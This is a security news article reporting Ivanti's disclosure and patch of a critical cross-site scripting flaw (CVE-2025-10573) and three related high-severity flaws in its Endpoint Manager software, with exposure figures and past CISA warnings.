Ivanti warns of critical code execution flaw in Endpoint Manager
▼ Summary
– Ivanti has disclosed a critical vulnerability (CVE-2025-10573) in its Endpoint Manager software that allows remote attackers to execute arbitrary code via cross-site scripting.
– This flaw enables an attacker to poison the administrator dashboard with malicious JavaScript, which then executes when an administrator views it, hijacking their session.
– Ivanti has released a patch (EPM 2024 SU4 SR1) and notes the risk is lower because the software is not designed for internet exposure, yet hundreds of instances are currently online.
– The company also patched three high-severity vulnerabilities, with two allowing arbitrary code execution, though exploitation requires specific user interaction.
– While no current exploitation is known, Ivanti EPM flaws have a history of being targeted, as evidenced by past CISA warnings and mandates to patch similar actively exploited vulnerabilities.
A critical vulnerability in Ivanti’s Endpoint Manager (EPM) software demands immediate attention from system administrators. The flaw, identified as CVE-2025-10573, enables remote attackers to execute arbitrary code on affected systems. This security weakness allows unauthenticated individuals to run malicious JavaScript by exploiting a cross-site scripting issue, though it does require some interaction from a user to succeed.
The problem arises when an attacker gains access to the main EPM web service. They can then introduce fake managed devices to the server, which contaminates the administrator’s web dashboard with harmful code. When an administrator simply views this compromised dashboard during their routine work, the malicious script activates, handing control of the administrator’s session over to the attacker. This type of takeover can lead to severe network compromise.
Ivanti, a major provider of IT management solutions to tens of thousands of organizations globally, has issued a patch in its EPM 2024 SU4 SR1 update. The company emphasizes that the risk is theoretically lower because EPM systems are not designed for direct internet exposure. However, real-world data complicates that assessment. Monitoring by the Shadowserver platform reveals hundreds of Ivanti EPM instances are currently accessible online, with the highest concentrations in the United States, Germany, and Japan. This exposure significantly increases the potential for exploitation.
In the same security update, Ivanti addressed three additional high-severity vulnerabilities. Two of these, tracked as CVE-2025-13659 and CVE-2025-13662, could also permit unauthenticated remote code execution. Successful attacks for these flaws would require targets to connect to a malicious server or import corrupted configuration files. Ivanti states there is no current evidence of these vulnerabilities being used in active attacks, and they were responsibly disclosed through the company’s security program.
Despite the lack of observed exploitation for these specific issues, Ivanti EPM has been a repeated target for cybercriminals. Earlier this year, U.S. cybersecurity authorities flagged multiple critical EPM vulnerabilities that were being actively used in attacks. The Cybersecurity and Infrastructure Security Agency (CISA) mandated federal agencies to patch these flaws within strict deadlines, highlighting the product’s attractiveness to threat actors. This history underscores the importance of applying the latest updates promptly to protect network integrity.
(Source: Bleeping Computer)
